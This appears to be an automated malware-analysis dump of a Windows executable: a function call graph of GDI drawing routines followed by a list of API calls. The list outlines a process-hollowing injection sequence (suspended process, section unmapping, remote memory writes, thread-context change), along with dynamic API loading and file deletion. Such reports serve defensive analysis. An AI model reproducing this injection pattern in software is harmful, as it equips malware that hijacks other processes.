CopyRect 3297->3298 3453 404850 3298->3453 3300 4033d1 CopyRect 3301 403e10 7 API calls 3300->3301 3302 4033f1 CopyRect 3301->3302 3454 404850 3302->3454 3304 403411 CopyRect 3305 403e10 7 API calls 3304->3305 3306 403431 CopyRect 3305->3306 3455 404850 3306->3455 3308 403451 CopyRect 3309 403e10 7 API calls 3308->3309 3310 403471 CopyRect 3309->3310 3456 404850 3310->3456 3312 403491 CopyRect 3313 403e10 7 API calls 3312->3313 3314 4034b1 CopyRect 3313->3314 3457 404850 3314->3457 3316 4034d1 CopyRect 3317 403e10 7 API calls 3316->3317 3318 4034f1 CopyRect 3317->3318 3458 404850 3318->3458 3320 403511 CopyRect 3321 403e10 7 API calls 3320->3321 3322 403531 CopyRect 3321->3322 3459 404850 3322->3459 3324 403551 CopyRect 3325 403e10 7 API calls 3324->3325 3326 403571 CopyRect 3325->3326 3460 404850 3326->3460 3328 403591 CopyRect 3329 403e10 7 API calls 3328->3329 3330 4035b1 CopyRect 3329->3330 3461 404850 3330->3461 3332 4035d1 CopyRect 3333 403e10 7 API calls 3332->3333 3334 4035f1 CopyRect 3333->3334 3462 404850 3334->3462 3336 403611 CopyRect 3337 403e10 7 API calls 3336->3337 3338 403631 CopyRect 3337->3338 3463 404850 3338->3463 3340 403651 CopyRect 3341 403e10 7 API calls 3340->3341 3342 403671 CopyRect 3341->3342 3343 403e10 7 API calls 3342->3343 3344 403691 CopyRect 3343->3344 3464 404360 3344->3464 3346 4036b1 CopyRect 3347 403e10 7 API calls 3346->3347 3348 4036d1 CopyRect 3347->3348 3349 404360 7 API calls 3348->3349 3350 4036f1 CopyRect 3349->3350 3351 403e10 7 API calls 3350->3351 3352 403711 CopyRect 3351->3352 3353 404360 7 API calls 3352->3353 3354 403731 CopyRect 3353->3354 3355 404360 7 API calls 3354->3355 3356 403751 CopyRect 3355->3356 3357 403e10 7 API calls 3356->3357 3358 403771 CopyRect 3357->3358 3359 404360 7 API calls 3358->3359 3360 403791 CopyRect 3359->3360 3361 403e10 7 API calls 3360->3361 3362 4037b1 CopyRect 3361->3362 3363 404360 7 API calls 3362->3363 3364 4037d1 CopyRect 3363->3364 3365 403e10 7 API calls 3364->3365 3366 4037f1 CopyRect 3365->3366 3367 404360 7 API calls 3366->3367 3368 403811 CopyRect 3367->3368 3369 404360 7 API calls 3368->3369 3370 403831 CopyRect 3369->3370 3371 404360 7 API calls 3370->3371 3372 403851 CopyRect 3371->3372 3373 403e10 7 API calls 3372->3373 3374 403871 CopyRect 3373->3374 3375 403e10 7 API calls 3374->3375 3376 403891 CopyRect 3375->3376 3377 404360 7 API calls 3376->3377 3378 4038b1 CopyRect 3377->3378 3379 403e10 7 API calls 3378->3379 3380 4038d1 CopyRect 3379->3380 3381 403e10 7 API calls 3380->3381 3382 4038f1 CopyRect 3381->3382 3383 404360 7 API calls 3382->3383 3384 403911 CopyRect 3383->3384 3385 404360 7 API calls 3384->3385 3386 403931 CopyRect 3385->3386 3387 403e10 7 API calls 3386->3387 3388 403951 CopyRect 3387->3388 3389 404360 7 API calls 3388->3389 3390 403971 CopyRect 3389->3390 3391 404360 7 API calls 3390->3391 3392 403991 CopyRect 3391->3392 3393 404360 7 API calls 3392->3393 3394 4039b1 SetWindowRgn SetCapture 3393->3394 3394->3062 3395->3068 3396->3072 3397->3076 3398->3080 3399->3084 3400->3088 3401->3092 3402->3096 3403->3100 3404->3104 3405->3108 3406->3112 3407->3116 3408->3120 3409->3124 3410->3128 3411->3132 3412->3136 3413->3140 3414->3144 3415->3148 3416->3152 3417->3156 3418->3160 3419->3164 3420->3168 3421->3172 3422->3176 3423->3180 3424->3184 3425->3188 3426->3192 3427->3196 3428->3200 3429->3204 3430->3208 3431->3212 3432->3216 3433->3220 3434->3224 3435->3228 3436->3232 3437->3236 3438->3240 3439->3244 3440->3248 3441->3252 3442->3256 3443->3260 3444->3264 3445->3268 3446->3272 3447->3276 3448->3280 3449->3284 3450->3288 3451->3292 3452->3296 3453->3300 3454->3304 3455->3308 3456->3312 3457->3316 3458->3320 3459->3324 3460->3328 3461->3332 3462->3336 3463->3340 3468 4043a3 3464->3468 3465 40454a 3466 404560 CreatePolygonRgn 3465->3466 3467 4045cb CreatePolygonRgn 3465->3467 3469 404570 3466->3469 3474 4045d9 3467->3474 3468->3465 3470 4044e9 _ftol _ftol 3468->3470 3471 40457b CombineRgn CreatePolygonRgn 3469->3471 3470->3465 3470->3470 3472 40ae02 3471->3472 3473 40459f CombineRgn 3472->3473 3473->3474 3474->3346 3476 40a940 GetWindowRect 3477 40aa54 ClientToScreen 3476->3477 3478 40a99f 3476->3478 3480 40aa52 3477->3480 3478->3480 3488 4052c0 CopyRect 3478->3488 3481 40a9d0 _ftol 3481->3480 3482 40a9ec 3481->3482 3482->3480 3483 40aa08 GetWindowRect 3482->3483 3484 40aa1f 3483->3484 3485 405300 42 API calls 3484->3485 3486 40aa30 SetWindowRgn 3485->3486 3489 40a440 IsIconic 3486->3489 3488->3481 3490 40a474 3489->3490 3492 40a50d 3489->3492 3491 40a481 SendMessageA GetSystemMetrics GetSystemMetrics GetClientRect DrawIcon 3490->3491 3500 40a508 3491->3500 3496 40a5b2 LPtoDP 3492->3496 3492->3500 3502 40a640 3492->3502 3493 40a65a GetWindowRect 3494 40a67d 3493->3494 3503 404a40 CopyRect 3494->3503 3497 40a5e5 3496->3497 3498 40a5fd GetMapMode 3497->3498 3499 40b054 3498->3499 3501 40a616 DPtoLP 3499->3501 3500->3480 3501->3502 3502->3493 3504 4039c0 3 API calls 3503->3504 3505 404a71 CopyRect 3504->3505 3506 4039c0 3 API calls 3505->3506 3507 404a91 CopyRect 3506->3507 3508 4039c0 3 API calls 3507->3508 3509 404ab1 CopyRect 3508->3509 3510 4039c0 3 API calls 3509->3510 3511 404ad1 CopyRect 3510->3511 3512 4039c0 3 API calls 3511->3512 3513 404af1 CopyRect 3512->3513 3514 4039c0 3 API calls 3513->3514 3515 404b11 CopyRect 3514->3515 3516 4039c0 3 API calls 3515->3516 3517 404b31 CopyRect 3516->3517 3518 4039c0 3 API calls 3517->3518 3519 404b51 CopyRect 3518->3519 3520 4039c0 3 API calls 3519->3520 3521 404b71 CopyRect 3520->3521 3522 4039c0 3 API calls 3521->3522 3523 404b91 CopyRect 3522->3523 3524 4039c0 3 API calls 3523->3524 3525 404bb1 CopyRect 3524->3525 3526 4039c0 3 API calls 3525->3526 3527 404bd1 CopyRect 3526->3527 3528 4039c0 3 API calls 3527->3528 3529 404bf1 CopyRect 3528->3529 3530 4039c0 3 API calls 3529->3530 3531 404c11 CopyRect 3530->3531 3532 4039c0 3 API calls 3531->3532 3533 404c31 CopyRect 3532->3533 3534 4039c0 3 API calls 3533->3534 3535 404c51 CopyRect 3534->3535 3536 4039c0 3 API calls 3535->3536 3537 404c71 CopyRect 3536->3537 3538 4039c0 3 API calls 3537->3538 3539 404c91 CopyRect 3538->3539 3540 4039c0 3 API calls 3539->3540 3541 404cb1 CopyRect 3540->3541 3542 4039c0 3 API calls 3541->3542 3543 404cd1 CopyRect 3542->3543 3544 4039c0 3 API calls 3543->3544 3545 404cf1 CopyRect 3544->3545 3546 4039c0 3 API calls 3545->3546 3547 404d11 CopyRect 3546->3547 3548 4039c0 3 API calls 3547->3548 3549 404d31 CopyRect 3548->3549 3550 4039c0 3 API calls 3549->3550 3551 404d51 CopyRect 3550->3551 3552 4039c0 3 API calls 3551->3552 3553 404d71 CopyRect 3552->3553 3554 4039c0 3 API calls 3553->3554 3555 404d91 CopyRect 3554->3555 3556 4039c0 3 API calls 3555->3556 3557 404db1 CopyRect 3556->3557 3558 4039c0 3 API calls 3557->3558 3559 404dd1 CopyRect 3558->3559 3560 4039c0 3 API calls 3559->3560 3561 404df1 CopyRect 3560->3561 3562 4039c0 3 API calls 3561->3562 3563 404e11 CopyRect 3562->3563 3564 4039c0 3 API calls 3563->3564 3565 404e31 CopyRect 3564->3565 3566 4039c0 3 API calls 3565->3566 3567 404e51 CopyRect 3566->3567 3568 4039c0 3 API calls 3567->3568 3569 404e71 CopyRect 3568->3569 3570 4039c0 3 API calls 3569->3570 3571 404e91 CopyRect 3570->3571 3572 4039c0 3 API calls 3571->3572 3573 404eb1 3572->3573 3573->3500 3575 40ad00 DrawTextA 2569 40b10f __set_app_type __p__fmode __p__commode 2570 40b17e 2569->2570 2571 40b192 2570->2571 2572 40b186 __setusermatherr 2570->2572 2581 40b280 _controlfp 2571->2581 2572->2571 2574 40b197 _initterm __getmainargs _initterm 2575 40b1eb GetStartupInfoA 2574->2575 2577 40b21f GetModuleHandleA 2575->2577 2582 40b2a2 69FD4ED0 2577->2582 2580 40b243 exit _XcptFilter 2581->2574 2582->2580 2583 40ac50 TextOutA 2585 40ac10 PtVisible 2586 40a810 2590 409c60 2586->2590 2588 40a838 ReleaseCapture GetWindowRect 2589 40a863 2588->2589 2591 409c6c 2590->2591 2591->2588 3589 40a190 3590 40a198 ReleaseCapture 3589->3590 2592 409e20 2595 409e47 2592->2595 2593 409f76 GetWindowRect 2594 409f99 2593->2594 2604 401040 CopyRect 2594->2604 2597 409ece LPtoDP 2595->2597 2602 409f5c 2595->2602 2598 409f01 2597->2598 2599 409f19 GetMapMode 2598->2599 2600 40b054 2599->2600 2601 409f32 DPtoLP 2600->2601 2601->2602 2602->2593 2603 409fab 2935 4039c0 2604->2935 2606 401071 CopyRect 2941 404670 2606->2941 2608 401091 CopyRect 2609 4039c0 3 API calls 2608->2609 2610 4010b1 CopyRect 2609->2610 2611 404670 3 API calls 2610->2611 2612 4010d1 CopyRect 2611->2612 2613 4039c0 3 API calls 2612->2613 2614 4010f1 CopyRect 2613->2614 2615 404670 3 API calls 2614->2615 2616 401111 CopyRect 2615->2616 2617 4039c0 3 API calls 2616->2617 2618 401131 CopyRect 2617->2618 2619 404670 3 API calls 2618->2619 2620 401151 CopyRect 2619->2620 2621 4039c0 3 API calls 2620->2621 2622 401171 CopyRect 2621->2622 2623 404670 3 API calls 2622->2623 2624 401191 CopyRect 2623->2624 2625 4039c0 3 API calls 2624->2625 2626 4011b1 CopyRect 2625->2626 2627 404670 3 API calls 2626->2627 2628 4011d1 CopyRect 2627->2628 2629 4039c0 3 API calls 2628->2629 2630 4011f1 CopyRect 2629->2630 2631 404670 3 API calls 2630->2631 2632 401211 CopyRect 2631->2632 2633 4039c0 3 API calls 2632->2633 2634 401231 CopyRect 2633->2634 2635 404670 3 API calls 2634->2635 2636 401251 CopyRect 2635->2636 2637 4039c0 3 API calls 2636->2637 2638 401271 CopyRect 2637->2638 2639 404670 3 API calls 2638->2639 2640 401291 CopyRect 2639->2640 2641 4039c0 3 API calls 2640->2641 2642 4012b1 CopyRect 2641->2642 2643 404670 3 API calls 2642->2643 2644 4012d1 CopyRect 2643->2644 2645 4039c0 3 API calls 2644->2645 2646 4012f1 CopyRect 2645->2646 2647 404670 3 API calls 2646->2647 2648 401311 CopyRect 2647->2648 2649 4039c0 3 API calls 2648->2649 2650 401331 CopyRect 2649->2650 2651 404670 3 API calls 2650->2651 2652 401351 CopyRect 2651->2652 2653 4039c0 3 API calls 2652->2653 2654 401371 CopyRect 2653->2654 2655 404670 3 API calls 2654->2655 2656 401391 CopyRect 2655->2656 2657 4039c0 3 API calls 2656->2657 2658 4013b1 CopyRect 2657->2658 2659 404670 3 API calls 2658->2659 2660 4013d1 CopyRect 2659->2660 2661 4039c0 3 API calls 2660->2661 2662 4013f1 CopyRect 2661->2662 2663 404670 3 API calls 2662->2663 2664 401411 CopyRect 2663->2664 2665 4039c0 3 API calls 2664->2665 2666 401431 CopyRect 2665->2666 2667 404670 3 API calls 2666->2667 2668 401451 CopyRect 2667->2668 2669 4039c0 3 API calls 2668->2669 2670 401471 CopyRect 2669->2670 2671 404670 3 API calls 2670->2671 2672 401491 CopyRect 2671->2672 2673 4039c0 3 API calls 2672->2673 2674 4014b1 CopyRect 2673->2674 2675 404670 3 API calls 2674->2675 2676 4014d1 CopyRect 2675->2676 2677 4039c0 3 API calls 2676->2677 2678 4014f1 CopyRect 2677->2678 2679 404670 3 API calls 2678->2679 2680 401511 CopyRect 2679->2680 2681 4039c0 3 API calls 2680->2681 2682 401531 CopyRect 2681->2682 2683 404670 3 API calls 2682->2683 2684 401551 CopyRect 2683->2684 2685 4039c0 3 API calls 2684->2685 2686 401571 CopyRect 2685->2686 2687 404670 3 API calls 2686->2687 2688 401591 CopyRect 2687->2688 2689 4039c0 3 API calls 2688->2689 2690 4015b1 CopyRect 2689->2690 2691 404670 3 API calls 2690->2691 2692 4015d1 CopyRect 2691->2692 2693 4039c0 3 API calls 2692->2693 2694 4015f1 CopyRect 2693->2694 2695 404670 3 API calls 2694->2695 2696 401611 CopyRect 2695->2696 2697 4039c0 3 API calls 2696->2697 2698 401631 CopyRect 2697->2698 2699 404670 3 API calls 2698->2699 2700 401651 CopyRect 2699->2700 2701 4039c0 3 API calls 2700->2701 2702 401671 CopyRect 2701->2702 2703 404670 3 API calls 2702->2703 2704 401691 CopyRect 2703->2704 2705 4039c0 3 API calls 2704->2705 2706 4016b1 CopyRect 2705->2706 2707 404670 3 API calls 2706->2707 2708 4016d1 CopyRect 2707->2708 2709 4039c0 3 API calls 2708->2709 2710 4016f1 CopyRect 2709->2710 2711 404670 3 API calls 2710->2711 2712 401711 CopyRect 2711->2712 2713 4039c0 3 API calls 2712->2713 2714 401731 CopyRect 2713->2714 2715 404670 3 API calls 2714->2715 2716 401751 CopyRect 2715->2716 2717 4039c0 3 API calls 2716->2717 2718 401771 CopyRect 2717->2718 2719 404670 3 API calls 2718->2719 2720 401791 CopyRect 2719->2720 2721 4039c0 3 API calls 2720->2721 2722 4017b1 CopyRect 2721->2722 2723 404670 3 API calls 2722->2723 2724 4017d1 CopyRect 2723->2724 2725 4039c0 3 API calls 2724->2725 2726 4017f1 CopyRect 2725->2726 2727 404670 3 API calls 2726->2727 2728 401811 CopyRect 2727->2728 2729 4039c0 3 API calls 2728->2729 2730 401831 CopyRect 2729->2730 2731 404670 3 API calls 2730->2731 2732 401851 CopyRect 2731->2732 2733 4039c0 3 API calls 2732->2733 2734 401871 CopyRect 2733->2734 2735 404670 3 API calls 2734->2735 2736 401891 CopyRect 2735->2736 2737 4039c0 3 API calls 2736->2737 2738 4018b1 CopyRect 2737->2738 2739 404670 3 API calls 2738->2739 2740 4018d1 CopyRect 2739->2740 2741 4039c0 3 API calls 2740->2741 2742 4018f1 CopyRect 2741->2742 2743 404670 3 API calls 2742->2743 2744 401911 CopyRect 2743->2744 2745 4039c0 3 API calls 2744->2745 2746 401931 CopyRect 2745->2746 2747 404670 3 API calls 2746->2747 2748 401951 CopyRect 2747->2748 2749 4039c0 3 API calls 2748->2749 2750 401971 CopyRect 2749->2750 2751 404670 3 API calls 2750->2751 2752 401991 CopyRect 2751->2752 2753 4039c0 3 API calls 2752->2753 2754 4019b1 CopyRect 2753->2754 2755 404670 3 API calls 2754->2755 2756 4019d1 CopyRect 2755->2756 2757 4039c0 3 API calls 2756->2757 2758 4019f1 CopyRect 2757->2758 2759 404670 3 API calls 2758->2759 2760 401a11 CopyRect 2759->2760 2761 4039c0 3 API calls 2760->2761 2762 401a31 CopyRect 2761->2762 2763 404670 3 API calls 2762->2763 2764 401a51 CopyRect 2763->2764 2765 4039c0 3 API calls 2764->2765 2766 401a71 CopyRect 2765->2766 2767 404670 3 API calls 2766->2767 2768 401a91 CopyRect 2767->2768 2769 4039c0 3 API calls 2768->2769 2770 401ab1 CopyRect 2769->2770 2771 404670 3 API calls 2770->2771 2772 401ad1 CopyRect 2771->2772 2773 4039c0 3 API calls 2772->2773 2774 401af1 CopyRect 2773->2774 2775 404670 3 API calls 2774->2775 2776 401b11 CopyRect 2775->2776 2777 4039c0 3 API calls 2776->2777 2778 401b31 CopyRect 2777->2778 2779 404670 3 API calls 2778->2779 2780 401b51 CopyRect 2779->2780 2781 4039c0 3 API calls 2780->2781 2782 401b71 CopyRect 2781->2782 2783 404670 3 API calls 2782->2783 2784 401b91 CopyRect 2783->2784 2785 4039c0 3 API calls 2784->2785 2786 401bb1 CopyRect 2785->2786 2787 404670 3 API calls 2786->2787 2788 401bd1 CopyRect 2787->2788 2789 4039c0 3 API calls 2788->2789 2790 401bf1 CopyRect 2789->2790 2791 404670 3 API calls 2790->2791 2792 401c11 CopyRect 2791->2792 2793 4039c0 3 API calls 2792->2793 2794 401c31 CopyRect 2793->2794 2795 404670 3 API calls 2794->2795 2796 401c51 CopyRect 2795->2796 2797 4039c0 3 API calls 2796->2797 2798 401c71 CopyRect 2797->2798 2799 404670 3 API calls 2798->2799 2800 401c91 CopyRect 2799->2800 2801 4039c0 3 API calls 2800->2801 2802 401cb1 CopyRect 2801->2802 2803 404670 3 API calls 2802->2803 2804 401cd1 CopyRect 2803->2804 2805 4039c0 3 API calls 2804->2805 2806 401cf1 CopyRect 2805->2806 2807 404670 3 API calls 2806->2807 2808 401d11 CopyRect 2807->2808 2809 4039c0 3 API calls 2808->2809 2810 401d31 CopyRect 2809->2810 2811 404670 3 API calls 2810->2811 2812 401d51 CopyRect 2811->2812 2813 4039c0 3 API calls 2812->2813 2814 401d71 CopyRect 2813->2814 2815 404670 3 API calls 2814->2815 2816 401d91 CopyRect 2815->2816 2817 4039c0 3 API calls 2816->2817 2818 401db1 CopyRect 2817->2818 2819 404670 3 API calls 2818->2819 2820 401dd1 CopyRect 2819->2820 2821 4039c0 3 API calls 2820->2821 2822 401df1 CopyRect 2821->2822 2823 404670 3 API calls 2822->2823 2824 401e11 CopyRect 2823->2824 2825 4039c0 3 API calls 2824->2825 2826 401e31 CopyRect 2825->2826 2827 404670 3 API calls 2826->2827 2828 401e51 CopyRect 2827->2828 2829 4039c0 3 API calls 2828->2829 2830 401e71 CopyRect 2829->2830 2831 404670 3 API calls 2830->2831 2832 401e91 CopyRect 2831->2832 2833 4039c0 3 API calls 2832->2833 2834 401eb1 CopyRect 2833->2834 2835 404670 3 API calls 2834->2835 2836 401ed1 CopyRect 2835->2836 2837 4039c0 3 API calls 2836->2837 2838 401ef1 CopyRect 2837->2838 2839 404670 3 API calls 2838->2839 2840 401f11 CopyRect 2839->2840 2841 4039c0 3 API calls 2840->2841 2842 401f31 CopyRect 2841->2842 2843 404670 3 API calls 2842->2843 2844 401f51 CopyRect 2843->2844 2845 4039c0 3 API calls 2844->2845 2846 401f71 CopyRect 2845->2846 2847 404670 3 API calls 2846->2847 2848 401f91 CopyRect 2847->2848 2849 4039c0 3 API calls 2848->2849 2850 401fb1 CopyRect 2849->2850 2851 404670 3 API calls 2850->2851 2852 401fd1 CopyRect 2851->2852 2853 4039c0 3 API calls 2852->2853 2854 401ff1 CopyRect 2853->2854 2855 404670 3 API calls 2854->2855 2856 402011 CopyRect 2855->2856 2857 4039c0 3 API calls 2856->2857 2858 402031 CopyRect 2857->2858 2859 404670 3 API calls 2858->2859 2860 402051 CopyRect 2859->2860 2861 4039c0 3 API calls 2860->2861 2862 402071 CopyRect 2861->2862 2863 404670 3 API calls 2862->2863 2864 402091 CopyRect 2863->2864 2865 4039c0 3 API calls 2864->2865 2866 4020b1 CopyRect 2865->2866 2867 404670 3 API calls 2866->2867 2868 4020d1 CopyRect 2867->2868 2869 4039c0 3 API calls 2868->2869 2870 4020f1 CopyRect 2869->2870 2871 404670 3 API calls 2870->2871 2872 402111 CopyRect 2871->2872 2873 4039c0 3 API calls 2872->2873 2874 402131 CopyRect 2873->2874 2875 404670 3 API calls 2874->2875 2876 402151 CopyRect 2875->2876 2877 4039c0 3 API calls 2876->2877 2878 402171 CopyRect 2877->2878 2879 404670 3 API calls 2878->2879 2880 402191 CopyRect 2879->2880 2881 4039c0 3 API calls 2880->2881 2882 4021b1 CopyRect 2881->2882 2883 4039c0 3 API calls 2882->2883 2884 4021d1 CopyRect 2883->2884 2947 4040f0 2884->2947 2886 4021f1 CopyRect 2887 4039c0 3 API calls 2886->2887 2888 402211 CopyRect 2887->2888 2889 4040f0 3 API calls 2888->2889 2890 402231 CopyRect 2889->2890 2891 4039c0 3 API calls 2890->2891 2892 402251 CopyRect 2891->2892 2893 4040f0 3 API calls 2892->2893 2894 402271 CopyRect 2893->2894 2895 4040f0 3 API calls 2894->2895 2896 402291 CopyRect 2895->2896 2897 4039c0 3 API calls 2896->2897 2898 4022b1 CopyRect 2897->2898 2899 4040f0 3 API calls 2898->2899 2900 4022d1 CopyRect 2899->2900 2901 4039c0 3 API calls 2900->2901 2902 4022f1 CopyRect 2901->2902 2903 4040f0 3 API calls 2902->2903 2904 402311 CopyRect 2903->2904 2905 4039c0 3 API calls 2904->2905 2906 402331 CopyRect 2905->2906 2907 4040f0 3 API calls 2906->2907 2908 402351 CopyRect 2907->2908 2909 4040f0 3 API calls 2908->2909 2910 402371 CopyRect 2909->2910 2911 4040f0 3 API calls 2910->2911 2912 402391 CopyRect 2911->2912 2913 4039c0 3 API calls 2912->2913 2914 4023b1 CopyRect 2913->2914 2915 4039c0 3 API calls 2914->2915 2916 4023d1 CopyRect 2915->2916 2917 4040f0 3 API calls 2916->2917 2918 4023f1 CopyRect 2917->2918 2919 4039c0 3 API calls 2918->2919 2920 402411 CopyRect 2919->2920 2921 4039c0 3 API calls 2920->2921 2922 402431 CopyRect 2921->2922 2923 4040f0 3 API calls 2922->2923 2924 402451 CopyRect 2923->2924 2925 4040f0 3 API calls 2924->2925 2926 402471 CopyRect 2925->2926 2927 4039c0 3 API calls 2926->2927 2928 402491 CopyRect 2927->2928 2929 4040f0 3 API calls 2928->2929 2930 4024b1 CopyRect 2929->2930 2931 4040f0 3 API calls 2930->2931 2932 4024d1 CopyRect 2931->2932 2933 4040f0 3 API calls 2932->2933 2934 4024f1 2933->2934 2934->2603 2936 4039f4 2935->2936 2937 403b03 _ftol _ftol 2936->2937 2938 403b5e 2936->2938 2940 403bac 2936->2940 2937->2937 2937->2938 2939 403b90 Polygon 2938->2939 2939->2940 2940->2606 2942 4046a5 2941->2942 2943 404776 _ftol _ftol 2942->2943 2944 4047d8 2942->2944 2946 404805 2942->2946 2943->2943 2943->2944 2945 4047eb Polyline 2944->2945 2945->2946 2946->2608 2948 40412b 2947->2948 2949 40423e _ftol _ftol 2948->2949 2950 404299 2948->2950 2952 4042ed 2948->2952 2949->2949 2949->2950 2951 4042c9 PolyPolygon 2950->2951 2951->2952 2952->2886 3591 40ada0 EnableWindow 3592 40a7a0 GetWindowRect 3593 40a7c1 3592->3593 3594 404ec0 24 API calls 3593->3594 3595 40a7e1 SetCapture 3594->3595 3596 40a7f4 3595->3596 2584 40b261 _exit 3045 40b2e3 3046 40b2e8 3045->3046 3049 40b2ba 3046->3049 3050 40b2bf 3049->3050 3051 40b2d4 _setmbcp 3050->3051 3052 40b2dd 3050->3052 3051->3052 2336 405830 2339 40a1b0 2336->2339 2338 405856 2340 40a1d9 2339->2340 2341 40a1fd LoadIconA 2340->2341 2341->2338 2953 40ac30 RectVisible 3475 40acb0 TabbedTextOutA 3574 40ad70 Escape 3576 40ad30 3577 40ad38 3576->3577 3578 40ad3b GrayStringA 3576->3578 3577->3578 3579 4057f0 3580 4057f5 3579->3580 3583 40b0c8 3580->3583 3586 40b09c 3583->3586 3585 40581a 3587 40b0b1 __dllonexit 3586->3587 3588 40b0a5 _onexit 3586->3588 3587->3585 3588->3585
                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(0000006B,?), ref: 004074E7
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 004074EA
                                                                        • LoadLibraryA.KERNEL32(0000006B,?), ref: 004074FD
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00407500
                                                                        • LoadLibraryA.KERNEL32(0000006B,Clos), ref: 00407563
                                                                        • LoadLibraryA.KERNELBASE(00000073,StcF), ref: 0040764D
                                                                        • LoadLibraryA.KERNEL32(00000073,StcF), ref: 00407666
                                                                        • LoadLibraryA.KERNEL32(advapi,00000052), ref: 0040767C
                                                                        • LoadLibraryA.KERNEL32(advapi,00000052), ref: 0040768F
                                                                        • LoadLibraryA.KERNEL32(advapi,RuV), ref: 0040769F
                                                                        • LoadLibraryA.KERNEL32(advapi,RuV), ref: 004076B5
                                                                        • LoadLibraryA.KERNEL32(advapi,00000052), ref: 004076C5
                                                                        • LoadLibraryA.KERNEL32(advapi,00000052), ref: 004076D5
                                                                        • LoadLibraryA.KERNEL32(advapi,00000052), ref: 004076E5
                                                                        • LoadLibraryA.KERNEL32(0000006B,?), ref: 004077AC
                                                                        • LoadLibraryA.KERNEL32(0000006B,?), ref: 004077BC
                                                                        • LoadLibraryA.KERNEL32(advapi,0000004F), ref: 004077CC
                                                                        • LoadLibraryA.KERNEL32(advapi,?), ref: 004077E2
                                                                        • LoadLibraryA.KERNEL32(advapi,Allocat), ref: 004077F8
                                                                        • LoadLibraryA.KERNEL32(advapi,EqualSid), ref: 0040780E
                                                                        • LoadLibraryA.KERNEL32(advapi,LookupAccountSidA), ref: 00407824
                                                                        • LoadLibraryA.KERNEL32(0000006B,Clos), ref: 0040783A
                                                                        • LoadLibraryA.KERNEL32(0000006B,?), ref: 0040784A
                                                                        • LoadLibraryA.KERNEL32(0000006B,?), ref: 00407860
                                                                        • LoadLibraryA.KERNEL32(0000006B,Clos), ref: 00407876
                                                                        • LoadLibraryA.KERNELBASE(psapi.dll,?), ref: 00407A43
                                                                        • GetModuleFileNameW.KERNEL32(00000000,00000000,00000104), ref: 00407AFB
                                                                        • wcscpy.MSVCRT ref: 00407B17
                                                                        • wcscpy.MSVCRT ref: 00407F50
                                                                        • wcscat.MSVCRT ref: 00407F7A
                                                                        • wcscpy.MSVCRT ref: 00407F8A
                                                                        • wcscat.MSVCRT ref: 00407F9E
                                                                        • wcscat.MSVCRT ref: 00408144
                                                                        • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0040817F
                                                                        • Wow64GetThreadContext.KERNEL32 ref: 004081A2
                                                                        • NtReadVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 004081BE
                                                                        • NtUnmapViewOfSection.NTDLL(?,?), ref: 004081CF
                                                                        • NtUnmapViewOfSection.NTDLL(?,?), ref: 004081E0
                                                                        • NtUnmapViewOfSection.NTDLL(?,?), ref: 004081FF
                                                                        • NtUnmapViewOfSection.NTDLL(?,?), ref: 0040820D
                                                                        • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 00408288
                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 004082BF
                                                                        • VirtualAllocEx.KERNELBASE(?,-FFF00000,00100000,00003000,00000040,?,00003000,00000040), ref: 004082EE
                                                                        • WriteProcessMemory.KERNEL32(?,00000000,.dll,00000190,00000000,?,00003000,00000040), ref: 00408306
                                                                        • WriteProcessMemory.KERNELBASE(?,00000000,.dll,?,00000000,?,00003000,00000040), ref: 00408317
                                                                        • WriteProcessMemory.KERNELBASE(?,00000000,?,?,00000000,?,00003000,00000040), ref: 00408353
                                                                        • WriteProcessMemory.KERNELBASE(?,0000002E,0000006B,?,00000000,?,00003000,00000040), ref: 004083C0
                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,00000004,?,?,00003000,00000040), ref: 004083F5
                                                                        • Wow64SetThreadContext.KERNEL32(?,00010007,?,00003000,00000040), ref: 0040841A
                                                                        • WriteProcessMemory.KERNELBASE(?,00000050,?,00000004,00000000,?,00003000,00000040), ref: 00408480
                                                                        • ResumeThread.KERNELBASE(?,?,00003000,00000040), ref: 00408486
                                                                        • Wow64SuspendThread.KERNEL32(?,?,00003000,00000040), ref: 00408490
                                                                        • WriteProcessMemory.KERNELBASE(?,00000050,?,00000004,00000000,?,00003000,00000040), ref: 004084B5
                                                                        • wcscpy.MSVCRT ref: 00408760
                                                                        • wcscat.MSVCRT ref: 00408774
                                                                        • MoveFileExW.KERNELBASE(?,?,00000008), ref: 0040878D
                                                                        • CopyFileW.KERNELBASE(?,?,00000000), ref: 004087A3
                                                                        • ResumeThread.KERNELBASE(?), ref: 004087FC
                                                                        • Sleep.KERNELBASE(00000002), ref: 00408815
                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 00408837
                                                                        • Module32First.KERNEL32(00000000,00000000), ref: 004088AC
                                                                        • strstr.MSVCRT ref: 004088D6
                                                                        • Wow64SuspendThread.KERNEL32(?), ref: 00408904
                                                                        • Wow64SuspendThread.KERNEL32(?), ref: 0040891F
                                                                        • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00408926
                                                                        • DeleteFileW.KERNELBASE(?), ref: 00408930
                                                                        • ResumeThread.KERNELBASE(?), ref: 00408949
                                                                        • Sleep.KERNELBASE(00000002), ref: 0040894D
                                                                        • DeleteFileW.KERNELBASE(?), ref: 00408956
                                                                        • Wow64SuspendThread.KERNEL32(?), ref: 0040897B
                                                                        • Sleep.KERNELBASE(00000005), ref: 0040898A
                                                                        • MoveFileExW.KERNELBASE(?,?,00000008), ref: 0040899C
                                                                        • ResumeThread.KERNELBASE(?,?,00003000,00000040), ref: 004089B3
                                                                        • wcscat.MSVCRT ref: 00408A5B
                                                                        • wcsstr.MSVCRT ref: 00408A82
                                                                        • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00408AA2
                                                                        • TerminateProcess.KERNELBASE(00000000), ref: 00408AD9
                                                                        • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000002,00000000,00000000), ref: 00408C6D
                                                                        • CreateFileW.KERNELBASE(00000000,40000000,00000002,00000000,00000003,00000000,00000000), ref: 00408C8E
                                                                        • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00408CAF
